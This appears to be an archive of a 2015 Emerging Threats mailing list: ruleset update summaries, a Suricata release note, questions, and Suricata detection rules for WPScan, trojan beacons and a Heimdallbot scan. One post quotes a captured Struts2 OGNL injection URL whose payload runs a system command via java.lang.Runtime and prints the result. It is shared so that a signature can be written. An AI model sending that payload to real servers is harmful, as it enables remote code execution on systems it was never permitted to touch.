Pierre Schweitzer | 30 Jan 10:23 2015

WPScan

Dear all,

I was wondering about the need to make an ET rule to detect WPScan
usage against a possible WordPress installation. I made the test and so
far, it remains unseen, whereas it could be a potential scan prior to an
attack.

WPScan is using a UA such as: WPScan v2.6 (http://wpscan.org)
Also, it will try to open the readme.html (or readme.txt|TXT) of the WP
installation and will also do this for any theme installed (in
wp-content/themes/*/readme.txt|TXT).

It will also try to find a suitable wp-config.php file (looking for
old/backup as well), along with the xmlrpc.php file.

I can provide the complete trace upon request.

Cheers,
-- 
Pierre Schweitzer <pierre@...>
System & Network Administrator
Senior Kernel Developer
ReactOS Deutschland e.V.
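Added example, not from the original post and not an ET signature: three local Suricata rules covering the three fingerprints described above (the WPScan User-Agent, theme readme enumeration, and requests for backup copies of wp-config.php). The sids are placeholders in the local range, and the rules assume the standard $EXTERNAL_NET/$HOME_NET/$HTTP_PORTS variables and the Suricata 2.x keyword syntax used elsewhere on this list.

```suricata
# Added example rules (not ET signatures). sids 1000001-1000003 are local placeholders.

# 1. WPScan announces itself in the User-Agent ("WPScan v2.6 (http://wpscan.org)").
#    Anchor on the stable prefix only (depth:6) so later versions still match.
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"LOCAL SCAN WPScan User-Agent Inbound"; flow:established,to_server; content:"WPScan"; http_user_agent; depth:6; fast_pattern; reference:url,wpscan.org; classtype:attempted-recon; sid:1000001; rev:1;)

# 2. Theme enumeration: one request for a theme readme may be a human, five from
#    the same source inside a minute is a scanner. threshold alerts once per 5 hits.
#    The U flag makes the pcre run over the normalized http_uri buffer.
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"LOCAL SCAN Possible WordPress theme readme enumeration"; flow:established,to_server; content:"/wp-content/themes/"; http_uri; fast_pattern; content:"/readme."; http_uri; nocase; distance:0; pcre:"/\/wp-content\/themes\/[^\/]+\/readme\.(?:txt|html)/Ui"; threshold:type threshold, track by_src, count 5, seconds 60; classtype:attempted-recon; sid:1000002; rev:1;)

# 3. Backup copies of wp-config.php (wp-config.php.bak, .old, ~, .save, ...) are
#    never served by a healthy site, so a single request for one is worth an alert.
#    Assumption: the scanner keeps the "wp-config.php" stem and varies the suffix.
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"LOCAL SCAN Request for WordPress wp-config.php backup copy"; flow:established,to_server; content:"/wp-config.php"; http_uri; fast_pattern; pcre:"/\/wp-config\.php[.~_-]/Ui"; classtype:attempted-recon; sid:1000003; rev:1;)
```

Rule 1 is the cheapest match but depends on the default User-Agent; rules 2 and 3 key on behaviour and still hold when the UA is changed.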
Francis Trudeau | 29 Jan 23:14 2015

Daily Ruleset Update Summary 2015/01/29

 [***] Summary: [***]

 4 new Open, 22 new Pro signatures (4 + 18).  D-Link DSL-2740R vuln,
SiR-DoOoM, KJw0rm, Citroni/CTB Locker, Kakfum.

 Thanks: Eoin Miller, Wbbigdave, @rmkml, @abuse_ch, and @spookerlabs.

 [+++]          Added rules:          [+++]

 Open:

  2020329 - ET TROJAN Unknown Mailer CnC Beacon 2 (trojan.rules)
  2020330 - ET TROJAN Unknown Mailer CnC Beacon (trojan.rules)
  2020331 - ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate
detected (KINS CnC) (trojan.rules)
  2020332 - ET CURRENT_EVENTS Possible PHISH Dropbox - Landing Page -
Title over non SSL (current_events.rules)

 Pro:

  2809624 - ETPRO EXPLOIT D-Link DSL-2740R Remote DNS Change Attempt
(exploit.rules)
  2809625 - ETPRO TROJAN VBS/Jenxcus.A Checkin (trojan.rules)
  2809626 - ETPRO TROJAN SiR-DoOoM worm User-Agent (trojan.rules)
  2809627 - ETPRO TROJAN KJw0rm User-Agent (trojan.rules)
  2809628 - ETPRO TROJAN SiR-DoOoM worm CnC Beacon (trojan.rules)
  2809629 - ETPRO TROJAN KJw0rm CnC Beacon (trojan.rules)
  2809630 - ETPRO TROJAN SiR-DoOoM worm CnC Beacon Response (trojan.rules)
  2809631 - ETPRO TROJAN Critroni Variant .onion Proxy Domain (trojan.rules)
  2809632 - ETPRO MOBILE_MALWARE Android Hideicon Download

Victor Julien | 29 Jan 18:41 2015

Suricata 2.1beta3 Available!

The OISF development team is proud to announce Suricata 2.1beta3. This
is the third beta release for the upcoming 2.1 version. It should be
considered a development snapshot for the 2.1 branch.

Get the new release here:
http://www.openinfosecfoundation.org/download/suricata-2.1beta3.tar.gz

New features

Feature #1309: Lua support for Stats output
Feature #1310: Modbus parsing and matching

Improvements

Optimization #1339: flow timeout optimization
Optimization #1371: mpm optimization
Feature #1317: Lua: Indicator for end of flow
Feature #1333: unix-socket: allow (easier) non-root usage
Feature #1261: Request for Additional Lua Capabilities

Bug fixes

Bug #977: WARNING on empty rules file is fatal (should not be)
Bug #1184: pfring: cppcheck warnings
Bug #1321: Flow memuse bookkeeping error
Bug #1327: pcre pkt/flowvar capture broken for non-relative matches (master)
Bug #1332: cppcheck: ioctl
Bug #1336: modbus: CID 1257762: Logically dead code (DEADCODE)
Bug #1351: output-json: duplicate logging (2.1.x)
Bug #1354: coredumps on quitting on OpenBSD

Francis Trudeau | 28 Jan 23:57 2015

Daily Ruleset Update Summary 2015/01/28

 [***] Summary: [***]

 9 new Open sigs, 32 new Pro (9 + 23).  Job314/Neutrino, CVE-2015-0235
Exim vuln, Wordpress PingBack GHOST.

 Thanks: Pierre Schweitzer, Kevin Ross, @abuse_ch, and UT Austin
Information Security Office.

 [+++]          Added rules:          [+++]

 Open:

  2020320 - ET CURRENT_EVENTS Job314/Neutrino Reboot EK Landing Jan 27
2015 (current_events.rules)
  2020321 - ET CURRENT_EVENTS Job314/Neutrino Reboot EK Landing Jan 27
2015 (current_events.rules)
  2020322 - ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate
detected (KINS CnC) (trojan.rules)
  2020323 - ET WEB_SERVER Heimdallbot Attack Tool Inbound (web_server.rules)
  2020324 - ET POLICY Onion2Web Tor Proxy Cookie (policy.rules)
  2020325 - ET EXPLOIT CVE-2015-0235 Exim Buffer Overflow Attempt
(HELO) (exploit.rules)
  2020326 - ET EXPLOIT CVE-2015-0235 Exim Buffer Overflow Attempt
(HELO) (exploit.rules)
  2020327 - ET WEB_SPECIFIC_APPS Wordpress PingBack Possbile GHOST
attempt (web_specific_apps.rules)
  2020328 - ET CURRENT_EVENTS Possible Dridex Campaign Download Jan 28
2014 (current_events.rules)

 Pro:

Kevin Ross | 28 Jan 16:14 2015

SIGS: ET TROJAN Symmi.22722 & ET POLICY Onion2Web Cookie

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Symmi.22722 CnC Beacon"; flow:established,to_server; content:"/index.php?email="; fast_pattern; http_uri; content:"&method="; http_uri; content:"&len"; http_uri; content:!"Referer|3A|"; http_header; content:!"User-Agent|3A|"; http_header; classtype:trojan-activity; reference:md5,062da1efea7bce620a2b925b53d818c5; sid:156611; rev:1;)

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET POLICY Onion2Web Cookie"; flow:established,to_server; content:"onion2web_confirmed="; http_cookie; fast_pattern:only; classtype:policy-violation; reference:md5,a46e609662eb94a726fcb4471b7057d4; reference:md5,2b62cdb6bcec4bff47eff437e4fc46d3; reference:url,github.com/starius/onion2web; sid:156612; rev:1;)


Kind Regards,
Kevin Ross
Pierre Schweitzer | 28 Jan 10:00 2015

Heimdallbot

Dear all,

We spotted yesterday totally non-legit traffic coming from an
Alibaba-Inc IP on our infrastructure. ET rules were capable of matching
most of its vulnerability exploitation attempts. But it seems that one
of the requests wasn't caught by ET.
I'm sharing it here, if it's possible to design a rule. It's obviously
definitely not legit. It was apparently targeting phpBB (for that
specific query).

/forum/memberlist.php?%28%27%5Cu0023context%5B%5C%27xwork.MethodAccessor.denyMethodExecution%5C%27%5D%5Cu003dfalse%27%29%28bla%29%28bla%29&%28%27%5Cu0023_memberAccess.excludeProperties%5Cu003d%40java.util.Collections%40EMPTY_SET%27%29%28kxlzx%29%28kxlzx%29&%28%27%5Cu0023_memberAccess.allowStaticMethodAccess%5Cu003dtrue%27%29%28bla%29%28bla%29&%28%27%5Cu0023mycmd%5Cu003d%5C%27ifconfig%5C%27%27%29%28bla%29%28bla%29&%28%27%5Cu0023myret%5Cu003d%40java.lang.Runtime%40getRuntime%28%29.exec%28%5Cu0023mycmd%29%27%29%28bla%29%28bla%29&%28A%29%28%28%27%5Cu0023mydat%5Cu003dnew%5C40java.io.DataInputStream%28%5Cu0023myret.getInputStream%28%29%29%27%29%28bla%29%29&%28B%29%28%28%27%5Cu0023myres%5Cu003dnew%5C40byte%5B51020%5D%27%29%28bla%29%29&%28C%29%28%28%27%5Cu0023mydat.readFully%28%5Cu0023myres%29%27%29%28bla%29%29&%28D%29%28%28%27%5Cu0023mystr%5Cu003dnew%5C40java.lang.String%28%5Cu0023myres%29%27%29%28bla%29%29&%28%27%5Cu0023myout%5Cu003d%40org.apache.struts2.ServletActionContext%40getResponse%28%29%27%29%28bla%29%28bla%29&%28E%29%28%28%27%5Cu0023myout.getWriter%28%29.println%28%5Cu0023%27heimdall181%27%29%27%29%28bla%29%29

I'm talking about heimdall here, because the UA for all the requests
was: Mozilla/5.0 compatible;Heimdallbot/3.0;+AlibabaGroup
And also note the println in the request.

If anyone has information, or wants more queries that were made by that
bot, be welcome.

With my best regards,
-- 
Pierre Schweitzer <pierre@...>
System & Network Administrator
Senior Kernel Developer
ReactOS Deutschland e.V.
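Added example, not from the original post and not the ET 2020323 signature: a pair of local Suricata rules for the request above. It is a Struts2 OGNL injection (the _memberAccess sandbox bypass followed by java.lang.Runtime), so the first rule keys on those tokens rather than on the Heimdallbot User-Agent, which a bot can change; the second fires only when the marker the payload prints via println comes back in the server's response, which means the host actually executed it. Sids, the flowbit name and the standard $HOME_NET/$EXTERNAL_NET/$HTTP_PORTS variables are assumptions.

```suricata
# Added example rules (not ET signatures). sids 1000004-1000005 and the flowbit
# name are local placeholders.

# Request: Suricata's http_uri buffer is percent-decoded, so after normalization
# the URI reads "\u0023_memberAccess.allowStaticMethodAccess\u003dtrue ... @java.lang.Runtime@getRuntime().exec(".
# The \uXXXX Java escapes are NOT decoded by the HTTP normalizer, so match only on
# tokens that appear literally in both encodings. Sets a flowbit for the response rule.
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"LOCAL WEB_SERVER Struts2 OGNL _memberAccess bypass with java.lang.Runtime in URI"; flow:established,to_server; content:"_memberAccess"; http_uri; fast_pattern; content:"allowStaticMethodAccess"; http_uri; distance:0; content:"java.lang.Runtime"; http_uri; flowbits:set,local.struts_ognl_rce; classtype:web-application-attack; sid:1000004; rev:1;)

# Response: the payload ends with println('heimdall181'). The trailing digits may
# be a per-run counter (assumption), so match the stable "heimdall" prefix in the
# body of the reply on the same flow. An alert here is a confirmed execution, not a probe.
alert tcp $HOME_NET $HTTP_PORTS -> $EXTERNAL_NET any (msg:"LOCAL WEB_SERVER Heimdallbot OGNL marker echoed in response - payload executed"; flow:established,from_server; flowbits:isset,local.struts_ognl_rce; content:"heimdall"; http_server_body; fast_pattern; classtype:successful-admin; sid:1000005; rev:1;)
```

A phpBB host never evaluates OGNL, so on the infrastructure described above only the first rule should ever fire; the second is what to triage first on any Java application server.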


Francis Trudeau | 27 Jan 23:23 2015

Daily Ruleset Update Summary 2015/01/27

 [***] Summary: [***]

 2 new Open signatures, 11 new Pro (2 + 9).  FerretCMS SQLi, SmartCMS
SQLi, CVE-2015-0235 Exim buffer overflow.

 Thanks: @rmkml

 [+++]          Added rules:          [+++]

 Open:

  2020315 - ET TROJAN KL-Remote / Cryp_Banker14 RAT connection (trojan.rules)
  2020316 - ET TROJAN KL-Remote / Cryp_Banker14 RAT response (trojan.rules)

 Pro:

  2809592 - ETPRO WEB_SPECIFIC_APPS FerretCMS SQLi Attempt
(web_specific_apps.rules)
  2809593 - ETPRO WEB_SPECIFIC_APPS SmartCMS SQLi Attempt
(web_specific_apps.rules)
  2809594 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Logisr.a
Uploading Info via FTP (mobile_malware.rules)
  2809595 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Logisr.a Checkin
(mobile_malware.rules)
  2809596 - ETPRO MOBILE_MALWARE Android.Riskware.SmsPay.EX Checkin
(mobile_malware.rules)
  2809597 - ETPRO EXPLOIT CVE-2015-0235 Exim Buffer Overflow Attempt
(EHLO) (exploit.rules)
  2809598 - ETPRO EXPLOIT CVE-2015-0235 Exim Buffer Overflow Attempt
(HELO) (exploit.rules)
  2809599 - ETPRO TROJAN KazyBot Checkin (trojan.rules)
  2809600 - ETPRO MALWARE Win32/SoftPulse.P HTTP Request (malware.rules)

 [///]     Modified active rules:     [///]

  2014726 - ET POLICY Outdated Windows Flash Version IE (policy.rules)
  2014727 - ET POLICY Outdated Mac Flash Version (policy.rules)
  2020300 - ET CURRENT_EVENTS DRIVEBY Nuclear EK Exploit Struct Jan 23
2015 (current_events.rules)
  2808129 - ETPRO MOBILE_MALWARE Trojan-SMS.AndroidOS.Agent.gl Checkin
(mobile_malware.rules)
Olude, GB A | 27 Jan 23:17 2015

ET CURRENT_EVENTS Possible Upatre SSL Cert ventureonsite.com

Hi Folks,

 

Looking at some traffic around this domain/signature. Can you please assist with additional detail on which Upatre campaign used this?

Any info on md5 or actual upatre sample would be immensely appreciated.

 

Thanks,

GB

Francis Trudeau | 26 Jan 23:23 2015

Daily Ruleset Update Summary 2015/01/26

 [***] Summary: [***]

 5 new Open signatures, 22 new Pro (5 + 17).  Regin, Dyre, PlugX,
Citroni/CTB locker.

 Thanks: @rmkml, black_ip and @abuse_ch

 [+++]          Added rules:          [+++]

 Open:

  2020308 - ET TROJAN Dyre Downloading Mailer (trojan.rules)
  2020309 - ET TROJAN Regin Hopscotch Module Accessing SMB2 Named Pipe
(Unicode) 1 (trojan.rules)
  2020310 - ET TROJAN Regin Hopscotch Module Accessing SMB Named Pipe
(Unicode) 2 (trojan.rules)
  2020313 - ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate
detected (KINS CnC) (trojan.rules)
  2020314 - ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate
detected (KINS CnC) (trojan.rules)

 Pro:

  2809575 - ETPRO TROJAN Potential PlugX DNS Command and Control via
TXT queries (trojan.rules)
  2809576 - ETPRO EXPLOIT Arris Cable Modem Backdoor Cookie 2 (exploit.rules)
  2809577 - ETPRO TROJAN Critroni Variant .onion Proxy Domain (trojan.rules)
  2809578 - ETPRO TROJAN Critroni Variant .onion Proxy Domain (trojan.rules)
  2809579 - ETPRO TROJAN Win32/Sality.AT Checkin (trojan.rules)
  2809580 - ETPRO TROJAN Python.a Checkin (trojan.rules)
  2809581 - ETPRO TROJAN WIN32/ZUPDAX.A!DHA Checkin (trojan.rules)
  2809582 - ETPRO MOBILE_MALWARE RiskTool.AndroidOS.SMSreg.ja Checkin
(mobile_malware.rules)
  2809583 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.SmForw.m Checkin
3 (mobile_malware.rules)
  2809584 - ETPRO MOBILE_MALWARE Android.Trojan.Banker.Z Checkin
(mobile_malware.rules)
  2809585 - ETPRO MOBILE_MALWARE Android.Riskware.SMSReg.EI Checkin
(mobile_malware.rules)
  2809586 - ETPRO TROJAN Win32/Neshta.A Checkin 4 (trojan.rules)
  2809587 - ETPRO TROJAN Win32/Spy.Agent.OLV Checkin (trojan.rules)
  2809588 - ETPRO TROJAN W32/Sourtoff Receiving Config (trojan.rules)
  2809589 - ETPRO MOBILE_MALWARE Android.Trojan.SMSSend.SO Checkin
(mobile_malware.rules)
  2809590 - ETPRO MOBILE_MALWARE RiskTool.AndroidOS.Frime.a Checkin
(mobile_malware.rules)
  2809591 - ETPRO MOBILE_MALWARE Android.Riskware.SMSReg.DL Checkin
(mobile_malware.rules)

 [///]     Modified active rules:     [///]

  2015891 - ET CURRENT_EVENTS CoolEK - Landing Page - Title
(current_events.rules)
  2019764 - ET CURRENT_EVENTS Job314/Neutrino Reboot EK Payload Nov 20
2014 (current_events.rules)
  2020212 - ET CURRENT_EVENTS Upatre Redirector IE Requesting Payload
Jan 19 2015 (current_events.rules)
  2805820 - ETPRO MOBILE_MALWARE Android/FkToken.A Checkin
(mobile_malware.rules)

 [---]         Removed rules:         [---]

  2015501 - ET TROJAN ProxyBox - HTTP CnC - Checkin Response (trojan.rules)
  2015815 - ET CURRENT_EVENTS CoolEK Font File Download (32-bit Host)
Dec 11 2012 (current_events.rules)
  2015816 - ET CURRENT_EVENTS CoolEK Font File Download (64-bit Host)
Dec 11 2012 (current_events.rules)
  2015892 - ET CURRENT_EVENTS CoolEK - PDF Exploit - pdf_new.php
(current_events.rules)
  2016059 - ET CURRENT_EVENTS CoolEK - Old PDF Exploit - Dec 18 2012
(current_events.rules)
  2016278 - ET CURRENT_EVENTS CoolEK - New PDF Exploit - Jan 24 2013
(current_events.rules)
  2016547 - ET CURRENT_EVENTS CoolEK Payload Download (6) (current_events.rules)
  2016559 - ET CURRENT_EVENTS CoolEK Payload Download (7) (current_events.rules)
  2016782 - ET CURRENT_EVENTS CoolEK Payload Download (8) (current_events.rules)
  2020283 - ET TROJAN DNS Query for Suspicious torwoman.com Domain -
Possible CryptoWall Activity (trojan.rules)
  2808452 - ETPRO MOBILE_MALWARE Trojan-Banker.AndroidOS.Faketoken.a
Checkin 2 (mobile_malware.rules)
Paul Halliday | 26 Jan 16:20 2015

Coverage for adobe flash player vuln

I see sid 2014726 but it looks like it is anchored to MSIE. The
advisory includes FF as well. Are there other sigs I should be paying
particular attention to?

Thanks!

-- 
Paul Halliday
http://www.pintumbler.org/
Francis Trudeau | 23 Jan 22:10 2015

Daily Ruleset Update Summary 2015/01/23

 [***] Summary: [***]

 14 new Open signatures, 16 new Pro (14 + 2).  Dridex, Scieron,
Upatre, Win32/Zemot.

 Thanks: Kevin Ross, Jack Mott, Nathan Fowler, @kafeine, @EKWatcher,
 @jaimeblascob and @abuse_ch

 [+++]          Added rules:          [+++]

 Open:

  2020293 - ET TROJAN W32/Adrom.Backdoor CnC Beacon (trojan.rules)
  2020294 - ET TROJAN W32/Upatre.Downloader Encoded Binary Download
Request (trojan.rules)
  2020295 - ET TROJAN Common Upatre Header Structure 3 (trojan.rules)
  2020296 - ET TROJAN Scieron Retrieving Information (trojan.rules)
  2020297 - ET TROJAN Scieron Retrieving Information Response (trojan.rules)
  2020298 - ET TROJAN Win32/Scieron-A UA (HTClient) (trojan.rules)
  2020299 - ET TROJAN Win32/Scieron-A Checkin via HTTP POST (trojan.rules)
  2020301 - ET TROJAN Dridex POST CnC Beacon 2 (trojan.rules)
  2020302 - ET TROJAN Dridex Post Checkin Activity 2 (trojan.rules)
  2020303 - ET TROJAN W32/AGENT.NXNX Checkin 2 (trojan.rules)
  2020304 - ET CURRENT_EVENTS Upatre Redirector Jan 23 2015
(current_events.rules)
  2020305 - ET DOS MC-SQLR Response Outbound Possible DDoS
Participation (dos.rules)
  2020306 - ET DOS MC-SQLR Response Inbound Possible DDoS Target (dos.rules)
  2020307 - ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate
detected (KINS CnC) (trojan.rules)

 Pro:

  2809573 - ETPRO TROJAN Win32/Zemot Requesting PE (trojan.rules)
  2809574 - ETPRO TROJAN Mal/Banker-EV CnC Beacon (trojan.rules)

 [///]     Modified active rules:     [///]

  2019964 - ET TROJAN W32/AGENT.NXNX checkin (trojan.rules)
  2020160 - ET CURRENT_EVENTS Upatre IE Redirector Receiving Payload
Jan 9 2015 (current_events.rules)
  2020205 - ET TROJAN Possible Mailer Dropped by Dyre SSL Cert (trojan.rules)
  2020212 - ET CURRENT_EVENTS Upatre Redirector IE Requesting Payload
Jan 19 2015 (current_events.rules)
  2809564 - ETPRO TROJAN Win32/Zemot Checkin 2 (trojan.rules)
